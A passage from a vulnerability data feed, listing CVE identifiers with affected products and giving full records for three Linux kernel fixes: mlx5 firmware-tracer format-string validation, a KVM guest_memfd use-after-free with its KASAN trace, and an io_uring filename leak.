"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68807"
},
{
"cve": "CVE-2025-68808",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68808"
},
{
"cve": "CVE-2025-68809",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68809"
},
{
"cve": "CVE-2025-68810",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68810"
},
{
"cve": "CVE-2025-68811",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68811"
},
{
"cve": "CVE-2025-68812",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68812"
},
{
"cve": "CVE-2025-68813",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-68814",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68814"
},
{
"cve": "CVE-2025-68815",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68815"
},
{
"cve": "CVE-2025-68816",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68816"
},
{
"cve": "CVE-2025-68817",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68817"
},
{
"cve": "CVE-2025-68818",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68818"
},
{
"cve": "CVE-2025-68819",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68819"
},
{
"cve": "CVE-2025-68820",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68820"
},
{
"cve": "CVE-2025-68821",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68821"
},
{
"cve": "CVE-2025-68822",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68822"
},
{
"cve": "CVE-2025-68823",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-68823"
},
{
"cve": "CVE-2025-71064",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71064"
},
{
"cve": "CVE-2025-71065",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71065"
},
{
"cve": "CVE-2025-71066",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71066"
},
{
"cve": "CVE-2025-71067",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71067"
},
{
"cve": "CVE-2025-71068",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71068"
},
{
"cve": "CVE-2025-71069",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71069"
},
{
"cve": "CVE-2025-71070",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71070"
},
{
"cve": "CVE-2025-71071",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71071"
},
{
"cve": "CVE-2025-71072",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71072"
},
{
"cve": "CVE-2025-71073",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71073"
},
{
"cve": "CVE-2025-71074",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71074"
},
{
"cve": "CVE-2025-71075",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71075"
},
{
"cve": "CVE-2025-71076",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71076"
},
{
"cve": "CVE-2025-71077",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71077"
},
{
"cve": "CVE-2025-71078",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71078"
},
{
"cve": "CVE-2025-71079",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71079"
},
{
"cve": "CVE-2025-71080",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71080"
},
{
"cve": "CVE-2025-71081",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71081"
},
{
"cve": "CVE-2025-71082",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71082"
},
{
"cve": "CVE-2025-71083",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71083"
},
{
"cve": "CVE-2025-71084",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71084"
},
{
"cve": "CVE-2025-71085",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71085"
},
{
"cve": "CVE-2025-71086",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71086"
},
{
"cve": "CVE-2025-71087",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71087"
},
{
"cve": "CVE-2025-71088",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71088"
},
{
"cve": "CVE-2025-71089",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71089"
},
{
"cve": "CVE-2025-71090",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71090"
},
{
"cve": "CVE-2025-71091",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71091"
},
{
"cve": "CVE-2025-71092",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71092"
},
{
"cve": "CVE-2025-71093",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71093"
},
{
"cve": "CVE-2025-71094",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71094"
},
{
"cve": "CVE-2025-71095",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71095"
},
{
"cve": "CVE-2025-71096",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71096"
},
{
"cve": "CVE-2025-71097",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71097"
},
{
"cve": "CVE-2025-71098",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71098"
},
{
"cve": "CVE-2025-71099",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71099"
},
{
"cve": "CVE-2025-71100",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71100"
},
{
"cve": "CVE-2025-71101",
"product_status": {
"known_affected": [
"T002207",
"T049905",
"T027843"
]
},
"release_date": "2026-01-13T23:00:00.000+00:00",
"title": "CVE-2025-71101"
}
]
}
CVE-2025-68816 (GCVE-0-2025-68816)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
Title
net/mlx5: fw_tracer, Validate format string parameters
Summary
In the Linux kernel, the following vulnerability has been resolved:

net/mlx5: fw_tracer, Validate format string parameters

Add validation for format string parameters in the firmware tracer to
prevent potential security vulnerabilities and crashes from malformed
format strings received from firmware.

The firmware tracer receives format strings from the device firmware and
uses them to format trace messages. Without proper validation, bad
firmware could provide format strings with invalid format specifiers
(e.g., %s, %p, %n) that could lead to crashes, or other undefined
behavior.

Add mlx5_tracer_validate_params() to validate that all format specifiers
in trace strings are limited to safe integer/hex formats (%x, %d, %i,
%u, %llx, %lx, etc.). Reject strings containing other format types that
could be used to access arbitrary memory or cause crashes.
Invalid format strings are added to the trace output for visibility with
"BAD_FORMAT: " prefix.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 70dd6fdb8987b14f7b6105f6be0617299e459398 , < 95624b731c490a4b849844269193a233d6d556a0 (git) |
| Linux | Linux | Affected: 70dd6fdb8987b14f7b6105f6be0617299e459398 , < 768d559f466cdd72849110a7ecd76a21d52dcfe3 (git) |
| Linux | Linux | Affected: 70dd6fdb8987b14f7b6105f6be0617299e459398 , < 38ac688b52ef26a88f8bc4fe26d24fdd0ff91e5d (git) |
| Linux | Linux | Affected: 70dd6fdb8987b14f7b6105f6be0617299e459398 , < 8ac688c0e430dab19f6a9b70df94b1f635612c1a (git) |
| Linux | Linux | Affected: 70dd6fdb8987b14f7b6105f6be0617299e459398 , < 45bd283b1d69e2c97cddcb9956f0e0261fc4efd7 (git) |
| Linux | Linux | Affected: 70dd6fdb8987b14f7b6105f6be0617299e459398 , < 8c35c2448086870509ede43947845be0833251f0 (git) |
| Linux | Linux | Affected: 70dd6fdb8987b14f7b6105f6be0617299e459398 , < b35966042d20b14e2d83330049f77deec5229749 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c",
"drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "95624b731c490a4b849844269193a233d6d556a0",
"status": "affected",
"version": "70dd6fdb8987b14f7b6105f6be0617299e459398",
"versionType": "git"
},
{
"lessThan": "768d559f466cdd72849110a7ecd76a21d52dcfe3",
"status": "affected",
"version": "70dd6fdb8987b14f7b6105f6be0617299e459398",
"versionType": "git"
},
{
"lessThan": "38ac688b52ef26a88f8bc4fe26d24fdd0ff91e5d",
"status": "affected",
"version": "70dd6fdb8987b14f7b6105f6be0617299e459398",
"versionType": "git"
},
{
"lessThan": "8ac688c0e430dab19f6a9b70df94b1f635612c1a",
"status": "affected",
"version": "70dd6fdb8987b14f7b6105f6be0617299e459398",
"versionType": "git"
},
{
"lessThan": "45bd283b1d69e2c97cddcb9956f0e0261fc4efd7",
"status": "affected",
"version": "70dd6fdb8987b14f7b6105f6be0617299e459398",
"versionType": "git"
},
{
"lessThan": "8c35c2448086870509ede43947845be0833251f0",
"status": "affected",
"version": "70dd6fdb8987b14f7b6105f6be0617299e459398",
"versionType": "git"
},
{
"lessThan": "b35966042d20b14e2d83330049f77deec5229749",
"status": "affected",
"version": "70dd6fdb8987b14f7b6105f6be0617299e459398",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c",
"drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.19"
},
{
"lessThan": "4.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "4.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: fw_tracer, Validate format string parameters\n\nAdd validation for format string parameters in the firmware tracer to\nprevent potential security vulnerabilities and crashes from malformed\nformat strings received from firmware.\n\nThe firmware tracer receives format strings from the device firmware and\nuses them to format trace messages. Without proper validation, bad\nfirmware could provide format strings with invalid format specifiers\n(e.g., %s, %p, %n) that could lead to crashes, or other undefined\nbehavior.\n\nAdd mlx5_tracer_validate_params() to validate that all format specifiers\nin trace strings are limited to safe integer/hex formats (%x, %d, %i,\n%u, %llx, %lx, etc.). Reject strings containing other format types that\ncould be used to access arbitrary memory or cause crashes.\nInvalid format strings are added to the trace output for visibility with\n\"BAD_FORMAT: \" prefix."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:21.606Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/95624b731c490a4b849844269193a233d6d556a0"
},
{
"url": "https://git.kernel.org/stable/c/768d559f466cdd72849110a7ecd76a21d52dcfe3"
},
{
"url": "https://git.kernel.org/stable/c/38ac688b52ef26a88f8bc4fe26d24fdd0ff91e5d"
},
{
"url": "https://git.kernel.org/stable/c/8ac688c0e430dab19f6a9b70df94b1f635612c1a"
},
{
"url": "https://git.kernel.org/stable/c/45bd283b1d69e2c97cddcb9956f0e0261fc4efd7"
},
{
"url": "https://git.kernel.org/stable/c/8c35c2448086870509ede43947845be0833251f0"
},
{
"url": "https://git.kernel.org/stable/c/b35966042d20b14e2d83330049f77deec5229749"
}
],
"title": "net/mlx5: fw_tracer, Validate format string parameters",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68816",
"datePublished": "2026-01-13T15:29:20.464Z",
"dateReserved": "2025-12-24T10:30:51.047Z",
"dateUpdated": "2026-01-19T12:19:21.606Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68810 (GCVE-0-2025-68810)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-13 15:29
Title
KVM: Disallow toggling KVM_MEM_GUEST_MEMFD on an existing memslot
Summary
In the Linux kernel, the following vulnerability has been resolved:

KVM: Disallow toggling KVM_MEM_GUEST_MEMFD on an existing memslot

Reject attempts to disable KVM_MEM_GUEST_MEMFD on a memslot that was
initially created with a guest_memfd binding, as KVM doesn't support
toggling KVM_MEM_GUEST_MEMFD on existing memslots. KVM prevents enabling
KVM_MEM_GUEST_MEMFD, but doesn't prevent clearing the flag.

Failure to reject the new memslot results in a use-after-free due to KVM
not unbinding from the guest_memfd instance. Unbinding on a FLAGS_ONLY
change is easy enough, and can/will be done as a hardening measure (in
anticipation of KVM supporting dirty logging on guest_memfd at some point),
but fixing the use-after-free would only address the immediate symptom.
==================================================================
BUG: KASAN: slab-use-after-free in kvm_gmem_release+0x362/0x400 [kvm]
Write of size 8 at addr ffff8881111ae908 by task repro/745
CPU: 7 UID: 1000 PID: 745 Comm: repro Not tainted 6.18.0-rc6-115d5de2eef3-next-kasan #3 NONE
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015
Call Trace:
<TASK>
dump_stack_lvl+0x51/0x60
print_report+0xcb/0x5c0
kasan_report+0xb4/0xe0
kvm_gmem_release+0x362/0x400 [kvm]
__fput+0x2fa/0x9d0
task_work_run+0x12c/0x200
do_exit+0x6ae/0x2100
do_group_exit+0xa8/0x230
__x64_sys_exit_group+0x3a/0x50
x64_sys_call+0x737/0x740
do_syscall_64+0x5b/0x900
entry_SYSCALL_64_after_hwframe+0x4b/0x53
RIP: 0033:0x7f581f2eac31
</TASK>
Allocated by task 745 on cpu 6 at 9.746971s:
kasan_save_stack+0x20/0x40
kasan_save_track+0x13/0x50
__kasan_kmalloc+0x77/0x90
kvm_set_memory_region.part.0+0x652/0x1110 [kvm]
kvm_vm_ioctl+0x14b0/0x3290 [kvm]
__x64_sys_ioctl+0x129/0x1a0
do_syscall_64+0x5b/0x900
entry_SYSCALL_64_after_hwframe+0x4b/0x53
Freed by task 745 on cpu 6 at 9.747467s:
kasan_save_stack+0x20/0x40
kasan_save_track+0x13/0x50
__kasan_save_free_info+0x37/0x50
__kasan_slab_free+0x3b/0x60
kfree+0xf5/0x440
kvm_set_memslot+0x3c2/0x1160 [kvm]
kvm_set_memory_region.part.0+0x86a/0x1110 [kvm]
kvm_vm_ioctl+0x14b0/0x3290 [kvm]
__x64_sys_ioctl+0x129/0x1a0
do_syscall_64+0x5b/0x900
entry_SYSCALL_64_after_hwframe+0x4b/0x53
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: a7800aa80ea4d5356b8474c2302812e9d4926fa6 , < 89dbbe6ff323fc34659621a577fe0af913f47386 (git) |
| Linux | Linux | Affected: a7800aa80ea4d5356b8474c2302812e9d4926fa6 , < cb51bef465d8ec60a968507330e01020e35dc127 (git) |
| Linux | Linux | Affected: a7800aa80ea4d5356b8474c2302812e9d4926fa6 , < 9935df5333aa503a18de5071f53762b65c783c4c (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"virt/kvm/kvm_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "89dbbe6ff323fc34659621a577fe0af913f47386",
"status": "affected",
"version": "a7800aa80ea4d5356b8474c2302812e9d4926fa6",
"versionType": "git"
},
{
"lessThan": "cb51bef465d8ec60a968507330e01020e35dc127",
"status": "affected",
"version": "a7800aa80ea4d5356b8474c2302812e9d4926fa6",
"versionType": "git"
},
{
"lessThan": "9935df5333aa503a18de5071f53762b65c783c4c",
"status": "affected",
"version": "a7800aa80ea4d5356b8474c2302812e9d4926fa6",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"virt/kvm/kvm_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.8"
},
{
"lessThan": "6.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: Disallow toggling KVM_MEM_GUEST_MEMFD on an existing memslot\n\nReject attempts to disable KVM_MEM_GUEST_MEMFD on a memslot that was\ninitially created with a guest_memfd binding, as KVM doesn\u0027t support\ntoggling KVM_MEM_GUEST_MEMFD on existing memslots. KVM prevents enabling\nKVM_MEM_GUEST_MEMFD, but doesn\u0027t prevent clearing the flag.\n\nFailure to reject the new memslot results in a use-after-free due to KVM\nnot unbinding from the guest_memfd instance. Unbinding on a FLAGS_ONLY\nchange is easy enough, and can/will be done as a hardening measure (in\nanticipation of KVM supporting dirty logging on guest_memfd at some point),\nbut fixing the use-after-free would only address the immediate symptom.\n\n ==================================================================\n BUG: KASAN: slab-use-after-free in kvm_gmem_release+0x362/0x400 [kvm]\n Write of size 8 at addr ffff8881111ae908 by task repro/745\n\n CPU: 7 UID: 1000 PID: 745 Comm: repro Not tainted 6.18.0-rc6-115d5de2eef3-next-kasan #3 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x51/0x60\n print_report+0xcb/0x5c0\n kasan_report+0xb4/0xe0\n kvm_gmem_release+0x362/0x400 [kvm]\n __fput+0x2fa/0x9d0\n task_work_run+0x12c/0x200\n do_exit+0x6ae/0x2100\n do_group_exit+0xa8/0x230\n __x64_sys_exit_group+0x3a/0x50\n x64_sys_call+0x737/0x740\n do_syscall_64+0x5b/0x900\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n RIP: 0033:0x7f581f2eac31\n \u003c/TASK\u003e\n\n Allocated by task 745 on cpu 6 at 9.746971s:\n kasan_save_stack+0x20/0x40\n kasan_save_track+0x13/0x50\n __kasan_kmalloc+0x77/0x90\n kvm_set_memory_region.part.0+0x652/0x1110 [kvm]\n kvm_vm_ioctl+0x14b0/0x3290 [kvm]\n __x64_sys_ioctl+0x129/0x1a0\n do_syscall_64+0x5b/0x900\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n\n Freed by task 745 on cpu 6 at 9.747467s:\n 
kasan_save_stack+0x20/0x40\n kasan_save_track+0x13/0x50\n __kasan_save_free_info+0x37/0x50\n __kasan_slab_free+0x3b/0x60\n kfree+0xf5/0x440\n kvm_set_memslot+0x3c2/0x1160 [kvm]\n kvm_set_memory_region.part.0+0x86a/0x1110 [kvm]\n kvm_vm_ioctl+0x14b0/0x3290 [kvm]\n __x64_sys_ioctl+0x129/0x1a0\n do_syscall_64+0x5b/0x900\n entry_SYSCALL_64_after_hwframe+0x4b/0x53"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:29:16.475Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/89dbbe6ff323fc34659621a577fe0af913f47386"
},
{
"url": "https://git.kernel.org/stable/c/cb51bef465d8ec60a968507330e01020e35dc127"
},
{
"url": "https://git.kernel.org/stable/c/9935df5333aa503a18de5071f53762b65c783c4c"
}
],
"title": "KVM: Disallow toggling KVM_MEM_GUEST_MEMFD on an existing memslot",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68810",
"datePublished": "2026-01-13T15:29:16.475Z",
"dateReserved": "2025-12-24T10:30:51.047Z",
"dateUpdated": "2026-01-13T15:29:16.475Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68814 (GCVE-0-2025-68814)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
Title
io_uring: fix filename leak in __io_openat_prep()
Summary
In the Linux kernel, the following vulnerability has been resolved:

io_uring: fix filename leak in __io_openat_prep()

__io_openat_prep() allocates a struct filename using getname(). However,
for the condition of the file being installed in the fixed file table as
well as having O_CLOEXEC flag set, the function returns early. At that
point, the request doesn't have REQ_F_NEED_CLEANUP flag set. Due to this,
the memory for the newly allocated struct filename is not cleaned up,
causing a memory leak.

Fix this by setting the REQ_F_NEED_CLEANUP for the request just after the
successful getname() call, so that when the request is torn down, the
filename will be cleaned up, along with other resources needing cleanup.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: b9445598d8c60a1379887b957024b71343965f74 , < 2420ef01b2e836fbc05a0a8c73a1016504eb0458 (git) |
| Linux | Linux | Affected: b9445598d8c60a1379887b957024b71343965f74 , < 8f44c4a550570cd5903625133f938c6b51310c9b (git) |
| Linux | Linux | Affected: b9445598d8c60a1379887b957024b71343965f74 , < 18b99fa603d0df5e1c898699c17d3b92ddc80746 (git) |
| Linux | Linux | Affected: b9445598d8c60a1379887b957024b71343965f74 , < e232269d511566b1f80872256a48593acc1becf4 (git) |
| Linux | Linux | Affected: b9445598d8c60a1379887b957024b71343965f74 , < 7fbfb85b05bc960cc50e09d03e5e562131e48d45 (git) |
| Linux | Linux | Affected: b9445598d8c60a1379887b957024b71343965f74 , < b14fad555302a2104948feaff70503b64c80ac01 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"io_uring/openclose.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
